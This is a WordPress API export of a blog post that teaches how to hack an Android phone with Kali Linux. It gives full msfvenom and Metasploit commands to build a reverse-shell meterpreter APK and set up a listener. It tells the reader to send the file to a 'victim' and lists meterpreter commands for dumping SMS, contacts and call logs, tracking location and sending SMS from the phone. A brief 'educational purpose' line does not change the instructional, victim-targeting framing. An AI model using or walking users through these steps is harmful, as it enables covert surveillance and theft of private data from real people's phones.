{"id":892,"date":"2020-05-12T09:14:02","date_gmt":"2020-05-12T08:14:02","guid":{"rendered":"http:\/\/zerothcode.com\/blog\/?p=892"},"modified":"2020-05-12T09:14:02","modified_gmt":"2020-05-12T08:14:02","slug":"hack-android-using-linux","status":"publish","type":"post","link":"https:\/\/zerothcode.com\/blog\/hack-android-using-linux\/","title":{"rendered":"Tutorial Hack Android phone using Kali Linux"},"content":{"rendered":"<p><span class=\"mycode_size\"><strong><em>Hy, today I am going to share an article om Hacking android phone using Kali Linux.<img decoding=\"async\" class=\"smilie smilie_28\" title=\"Biggrin\" src=\"https:\/\/sinister.ly\/images\/smilies\/set\/biggrin.png\" alt=\"Biggrin\" \/><img decoding=\"async\" class=\"smilie smilie_28\" title=\"Biggrin\" src=\"https:\/\/sinister.ly\/images\/smilies\/set\/biggrin.png\" alt=\"Biggrin\" \/><img decoding=\"async\" class=\"smilie smilie_24\" title=\"Smile\" src=\"https:\/\/sinister.ly\/images\/smilies\/set\/smile.png\" alt=\"Smile\" \/><\/em><\/strong><\/span><\/p>\n<p>Android phones have a large share in the smartphone market. So targeting an android phone is a very good option to hack.<\/p>\n<p>In this tutorial, I will use KALI Linux as an attacker PC and my Coolpad Note 3 as a victim phone which I am going to hack.<\/p>\n<p><strong><span class=\"mycode_b\"><span class=\"mycode_size\"><span class=\"mycode_color\">Things We Need<\/span><\/span><\/span><\/strong><\/p>\n<ol class=\"mycode_list\" type=\"1\">\n<li><em><span class=\"mycode_size\">Kali Linux installed.<\/span><\/em><\/li>\n<li><em><span class=\"mycode_size\">An Android phone.<\/span><\/em><\/li>\n<li><em><span class=\"mycode_size\">Brain<\/span><\/em><\/li>\n<\/ol>\n<h2><strong><span class=\"mycode_b\"><span class=\"mycode_size\"><span class=\"mycode_color\">Lets Start<\/span><\/span>\u00a0<\/span><\/strong><\/h2>\n<p><span class=\"mycode_size\">1. Open the Kali terminal.<\/span><\/p>\n<p><span class=\"mycode_size\">2. We will be going to use msfvenom to create a malicious app file that we will install on the android phone.<\/span><\/p>\n<p><span class=\"mycode_size\">3. Paste these commands in the terminal .<\/span><\/p>\n<blockquote class=\"mycode_quote\"><p>msfvenom -p android\/meterpreter\/reverse_tcp LHOST=172.16.27.207 R &gt; \/root\/CyberSucks.apk<\/p><\/blockquote>\n<p><span class=\"mycode_size\"><br \/>\n4. Change the LHOST to you local IP address and press enter.<\/span><\/p>\n<div class=\"mycode_align\"><img loading=\"lazy\" decoding=\"async\" class=\"mycode_img aligncenter\" src=\"https:\/\/2.bp.blogspot.com\/-0wA1jQJmKeI\/VzHxA5JBrxI\/AAAAAAAAA34\/7NXam9zMksM3S_Z-TQzCx7N3ivMNK9tvQCLcB\/s400\/post1.png\" alt=\"Android\" width=\"464\" height=\"313\" \/><\/div>\n<p><span class=\"mycode_size\"><br \/>\n5. \u00a0Now open the root folder and send the CyberSucks.apk to the victim.<\/span><\/p>\n<p><span class=\"mycode_size\">6. \u00a0Open new terminal and enter msfconsole.<\/span><\/p>\n<p><span class=\"mycode_size\">7. \u00a0After opening metasploit console type these following commands which \u00a0are used to create payload handler which will create connection\u00a0between victim and kali PC.<\/span><\/p>\n<blockquote class=\"mycode_quote\"><p>use exploit\/multi\/handler<br \/>\nset payload android\/meterpreter\/reverse_tcp<br \/>\nset lhost 172.16.27.207<br \/>\nexploit<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>8. Change the LHOST to your local ip address. Also don\u2019t close the<br \/>\nthis terminal.<\/p>\n<div class=\"mycode_align\"><img loading=\"lazy\" decoding=\"async\" class=\"mycode_img aligncenter\" src=\"https:\/\/2.bp.blogspot.com\/-oxzs_DZNFMo\/VzH8GbaciiI\/AAAAAAAAA4I\/7TcpC0RqKi86Js4pKe-idAxTiBxKRirBQCLcB\/s400\/post2.png\" alt=\"Android\" width=\"516\" height=\"348\" \/><\/div>\n<p><span class=\"mycode_size\"><br \/>\n9. \u00a0Wait until victim open the file.<\/span><\/p>\n<p><span class=\"mycode_size\">10. \u00a0After the victim open the file you will get a meterpreter session.<\/span><\/p>\n<p><span class=\"mycode_size\">11. Now open the msfconsole terminal and use session -i 1command to access the session.<\/span><\/p>\n<p><span class=\"mycode_size\">12. \u00a0In the meterpreter session you can use various commands that are given below to play different types of tricks on the victim phone like<\/span>\u00a0capturing a photo,screenshot,call logs,sms logs,sending a sms.<\/p>\n<p><span class=\"mycode_size\">\u00a0 \u00a0\u00a0<\/span><\/p>\n<blockquote class=\"mycode_quote\"><p>Command \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Description<br \/>\n\u2014\u2014- \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u2014\u2014\u2014\u2013<br \/>\nactivity_start \u00a0 \u00a0Start an Android activity from a Uri string<br \/>\ncheck_root \u00a0 \u00a0 \u00a0 \u00a0Check if device is rooted<br \/>\ndump_calllog \u00a0 \u00a0 \u00a0Get call log<br \/>\ndump_contacts \u00a0 \u00a0 Get contacts list<br \/>\ndump_sms \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Get sms messages<br \/>\ngeolocate \u00a0 \u00a0 \u00a0 \u00a0 Get current lat-long using geolocation<br \/>\ninterval_collect \u00a0Manage interval collection capabilities<br \/>\nsend_sms \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Sends SMS from target session<br \/>\nset_audio_mode \u00a0 \u00a0Set Ringer Mode<br \/>\nsqlite_query \u00a0 \u00a0 \u00a0Query a SQLite database from storage<br \/>\nwlan_geolocate \u00a0 \u00a0Get current lat-long using WLAN information<\/p><\/blockquote>\n<p><strong>Note:<\/strong><br \/>\n<span class=\"mycode_size\">1. Don\u2019t close the msfconsole terminal.<\/span><\/p>\n<p><span class=\"mycode_size\">2. This is only for educational purpose.<\/span><\/p>\n<p><a href=\"http:\/\/zerothcode.com\/blog\/spam-whatsapp\/\">Read more : Spam Whatsapp using Termux<\/a><\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"1HyxZ6VnDl\"><p><a href=\"https:\/\/zerothcode.com\/blog\/spam-whatsapp\/\">Spam WhatsApp-Termux<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Spam WhatsApp-Termux&#8221; &#8212; ZEROTHCODE\" src=\"https:\/\/zerothcode.com\/blog\/spam-whatsapp\/embed\/#?secret=1HyxZ6VnDl\" data-secret=\"1HyxZ6VnDl\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hy, today I am going to share an article om Hacking android phone using Kali Linux. Android phones have a<\/p>\n","protected":false},"author":1,"featured_media":893,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[51],"tags":[],"yst_prominent_words":[160,1324,1326,1338,692,1339,873,1329,1323,1331,1332,1337,1335,1327,1333,935,1334,1330,1322,1328],"class_list":["post-892","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tutorials"],"_links":{"self":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/892","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/comments?post=892"}],"version-history":[{"count":0,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/892\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media\/893"}],"wp:attachment":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media?parent=892"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/categories?post=892"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/tags?post=892"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/yst_prominent_words?post=892"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}